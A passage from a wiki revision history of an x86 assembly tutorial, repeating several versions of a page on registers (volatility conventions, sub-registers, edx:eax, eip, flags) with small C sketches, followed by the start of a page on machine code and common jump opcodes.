<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
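<br />
The same relationships can be expressed with masks and shifts in C. This is a sketch only: the helper names (low16, high8, low8, set_low8) are invented for this example, and a real program would simply name ax, ah or al in an instruction. <br />

```c
#include <stdint.h>

/* ax: the low 16 bits of a 32-bit register such as eax */
static uint16_t low16(uint32_t e)
{
    return (uint16_t)(e & 0xFFFFu);
}

/* ah: the high 8 bits of a 16-bit register such as ax */
static uint8_t high8(uint16_t x)
{
    return (uint8_t)(x >> 8);
}

/* al: the low 8 bits of a 16-bit register such as ax */
static uint8_t low8(uint16_t x)
{
    return (uint8_t)(x & 0xFFu);
}

/* Model of writing al: only the lowest 8 bits of eax change,
 * because al shares its storage with eax. */
static uint32_t set_low8(uint32_t e, uint8_t v)
{
    return (e & 0xFFFFFF00u) | v;
}
```

Using the first table above, low16(0x12345678) is 0x5678, high8(0x5678) is 0x56 and low8(0x5678) is 0x78. Writing 0xFF to al, modelled as set_low8(0x12345678, 0xFF), leaves eax holding 0x123456FF. <br />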
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32 bits of edx are put in front of the 32 bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
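<br />
In C terms, edx:eax behaves like a 64-bit integer whose upper half is edx and whose lower half is eax. The sketch below shows the concatenation and, as one assumed use, how an unsigned 32-bit multiplication would leave its 64-bit product split across the pair. The function names (join_edx_eax, mul32) are made up for illustration. <br />

```c
#include <stdint.h>

/* Build the 64-bit value edx:eax from its two 32-bit halves. */
static uint64_t join_edx_eax(uint32_t edx, uint32_t eax)
{
    return ((uint64_t)edx << 32) | eax;
}

/* Rough model of an unsigned 32-bit multiply: the 64-bit product is
 * split, with the high half going to edx and the low half to eax. */
static void mul32(uint32_t a, uint32_t b, uint32_t *edx, uint32_t *eax)
{
    uint64_t product = (uint64_t)a * b;

    *edx = (uint32_t)(product >> 32);
    *eax = (uint32_t)product;
}
```

join_edx_eax(0x11223344, 0xaabbccdd) gives 0x11223344aabbccdd, matching the table above. <br />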
<br />
== Questions ==<br />
Feel free to edit this section and post questions; I'll do my best to answer them, but you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3154Registers2012-01-16T03:15:28Z<p>Killboy: </p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. Most math (addition, subtraction, etc.) is done in registers, although x86 also lets many instructions operate directly on a value in memory. Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a feature of the compiler's standards and must be looked after in the code; registers are not preserved automatically (although in some assembly languages they are -- but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture. For special purpose and floating point registers, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to that class is often passed in ecx no matter what the calling convention is. <br />
<br />
ecx is also often used as a loop counter. ''for'' loops generally, although not always, keep the loop counter in ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it till it reaches 0. This class of instruction will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, while variables on the stack are referenced relative to the stack pointer, which moves throughout the function (this gets confusing -- luckily, IDA automatically detects and corrects for a moving stack pointer!).<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the top of the stack, which is the lowest address in use because the stack grows towards lower addresses. Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning, and the bits store meta-information about the results of previous operations: for example, whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register is usually around the ''cmp'' and ''test'' operations, which commonly set or clear the zero, carry and overflow flags.<br />
These flags are then tested by a conditional jump, which may control program flow or a loop.<br />
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers is that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is half of one of the 32-bit registers, so that changing the 16-bit also changes the 32-bit. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships between these registers are shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32 bits of edx are put in front of the 32 bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3153Registers2012-01-16T03:14:17Z<p>Killboy: /* 64-bit Registers */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. Most math (addition, subtraction, etc.) is done in registers, although x86 also lets many instructions operate directly on a value in memory. Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a feature of the compiler's standards and must be looked after in the code; registers are not preserved automatically (although in some assembly languages they are -- but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture. For special purpose and floating point registers, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to that class is often passed in ecx no matter what the calling convention is. <br />
<br />
ecx is also often used as a loop counter. ''for'' loops generally, although not always, keep the loop counter in ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it till it reaches 0. This class of instruction will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, while variables on the stack are referenced relative to the stack pointer, which moves throughout the function (this gets confusing -- luckily, IDA automatically detects and corrects for a moving stack pointer!).<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the top of the stack, which is the lowest address in use because the stack grows towards lower addresses. Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning, and the bits store meta-information about the results of previous operations: for example, whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register usually centers on the ''cmp'' and ''test'' instructions, which commonly set or clear the zero, carry and overflow flags.<br />
These flags are then tested by a conditional jump, which may control program flow or a loop.<br />
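<br />
To make the flag behaviour concrete, here is a rough C sketch of what a 32-bit ''cmp'' computes. The struct and function names are made up for illustration, and only the three flags mentioned above are modelled; the real flags register holds several more.<br />

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical container for the three flags discussed above. */
struct flags {
    bool zf; /* zero flag: the result was zero (operands were equal) */
    bool cf; /* carry flag: an unsigned borrow occurred (a < b)      */
    bool of; /* overflow flag: the signed result did not fit         */
};

/* Models "cmp a, b": computes a - b, throws the result away,
   and keeps only the flags. */
struct flags cmp32(uint32_t a, uint32_t b)
{
    uint32_t result = a - b;
    struct flags f;

    f.zf = (result == 0);
    f.cf = (a < b);
    /* Signed overflow on subtraction: the operands have different
       signs, and the sign of the result differs from the sign of a. */
    f.of = (((a ^ b) & (a ^ result)) >> 31) != 0;
    return f;
}
```

A ''je'' after the compare would branch when zf is set, and an unsigned ''jb'' would branch when cf is set.<br />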
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers is that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is the lower half of one of the 32-bit registers, so changing the 16-bit register also changes the 32-bit register. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationship between these registers is shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
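<br />
The same relationships can be written as masks and shifts in C. This is only a sketch: the helper names are invented for illustration, and a plain integer stands in for the register.<br />

```c
#include <stdint.h>

/* ax: the low 16 bits of eax. */
uint16_t low16(uint32_t reg)
{
    return (uint16_t)(reg & 0xFFFFu);
}

/* ah: the high byte of ax (bits 8..15 of eax). */
uint8_t high8(uint32_t reg)
{
    return (uint8_t)((reg >> 8) & 0xFFu);
}

/* al: the low byte of ax (bits 0..7 of eax). */
uint8_t low8(uint32_t reg)
{
    return (uint8_t)(reg & 0xFFu);
}

/* Writing al replaces only the lowest byte; the rest of eax is kept. */
uint32_t write_low8(uint32_t reg, uint8_t value)
{
    return (reg & 0xFFFFFF00u) | value;
}
```

With eax = 0x12345678, these helpers give the same values as the first table above, and writing 0xFF to al leaves eax as 0x123456FF.<br />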
<br />
== Special Purpose Registers ==<br />
=== eip ===<br />
<br />
''eip'', or the instruction pointer, is a special-purpose register which stores the address of the instruction that is currently executing. Making a jump is like adding to or subtracting from the instruction pointer. <br />
<br />
After each instruction, a value equal to the size of the instruction is added to eip, which means that eip points at the machine code for the next instruction. This simple example shows the automatic addition to eip at every step:<br />
<br />
eip+1 53 push ebx<br />
eip+4 8B 54 24 08 mov edx, [esp+arg_0]<br />
eip+2 31 DB xor ebx, ebx<br />
eip+2 89 D3 mov ebx, edx<br />
eip+3 8D 42 07 lea eax, [edx+7]<br />
.....<br />
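<br />
The listing above can be mimicked with a few lines of C. This is a sketch only: the function name and the starting address used with it are made up, and it covers straight-line code with no jumps.<br />

```c
#include <stddef.h>
#include <stdint.h>

/* Returns the value of eip after executing `count` straight-line
   instructions whose encoded sizes (in bytes) are given in `lengths`. */
uint32_t eip_after(uint32_t eip, const uint8_t *lengths, size_t count)
{
    size_t i;

    for (i = 0; i < count; i++)
        eip += lengths[i]; /* the CPU adds the size of each instruction */
    return eip;
}
```

The five instructions shown are 1, 4, 2, 2 and 3 bytes long, so eip ends up 12 (0x0C) bytes past where it started.<br />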
<br />
<br />
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32 bits of edx are put in front of the 32 bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
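<br />
In C terms, edx:eax behaves like a 64-bit integer split into two halves. The sketch below uses invented function names; the second function models how an unsigned 32-bit multiply leaves its 64-bit product in the register pair.<br />

```c
#include <stdint.h>

/* Builds the 64-bit value edx:eax from its two 32-bit halves. */
uint64_t combine_edx_eax(uint32_t edx, uint32_t eax)
{
    return ((uint64_t)edx << 32) | eax;
}

/* Models an unsigned 32x32 multiply: the high half of the product
   goes to edx and the low half goes to eax. */
void mul32(uint32_t a, uint32_t b, uint32_t *edx, uint32_t *eax)
{
    uint64_t product = (uint64_t)a * b;

    *edx = (uint32_t)(product >> 32);
    *eax = (uint32_t)(product & 0xFFFFFFFFu);
}
```

Combining the values from the table above gives 0x11223344aabbccdd, matching the last row.<br />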
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Machine_Code&diff=3152Machine Code2012-01-16T03:12:11Z<p>Killboy: </p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section discusses in more detail how an executable file full of hex becomes assembly, and what happens to that hex once it's loaded in memory. <br />
<br />
== Machine Code ==<br />
Machine code is simply an encoding of assembly language. Every assembly instruction is encoded as one or more bytes of machine code, and that sequence of bytes decodes to exactly one assembly instruction. The relationship is 1:1, by definition. <br />
<br />
This is different than the relationship between C and assembly. A sequence of C commands can translate to a variety of assembly instructions, and a sequence of assembly instructions can translate to C commands. There is no strong relationship. <br />
<br />
Here is what some machine code might look like:<br />
53 8b 54 24 08 31 db 89 d3 8d 42 07<br />
<br />
Obviously, that's nothing that any normal human can read. However, when converted to assembly, it looks like this:<br />
53 push ebx<br />
8B 54 24 08 mov edx, [esp+arg_0]<br />
31 DB xor ebx, ebx<br />
89 D3 mov ebx, edx<br />
8D 42 07 lea eax, [edx+7]<br />
<br />
To show the machine code in IDA, in the settings tab find the "opcode bytes" setting and change it to 6 or 8. <br />
<br />
Generally, if you need to find out the machine language opcodes for an instruction, either looking online or compiling/disassembling a program is the easiest way to go about it. A good reference book can be found [http://www.computer-books.us/assembler.php here], which can also be ordered for free in hard copy. <br />
<br />
Some opcodes, however, are so important that they should be committed to memory. These are listed below. Note that the parameters for the jumps are signed, relative offsets, measured from the address of the next instruction. That is, "74 10", for example, would jump 0x10 bytes ahead of the instruction that follows it, and "74 F0" would jump 0x10 bytes backwards from that same point. <br />
<br />
<table border='1' cellspacing='0' cellpadding='2'><br />
<tr><td width='100'>74 xx</td><td>je</td></tr><br />
<tr><td>75 xx</td><td>jnz</td></tr><br />
<tr><td>eb xx</td><td>jmp</td></tr><br />
<tr><td>e9 xx xx xx xx</td><td>jmp</td></tr><br />
<tr><td>e8 xx xx xx xx</td><td>call</td></tr><br />
<tr><td>c3</td><td>ret</td></tr><br />
<tr><td>c2 xx xx</td><td>ret xxxx</td></tr><br />
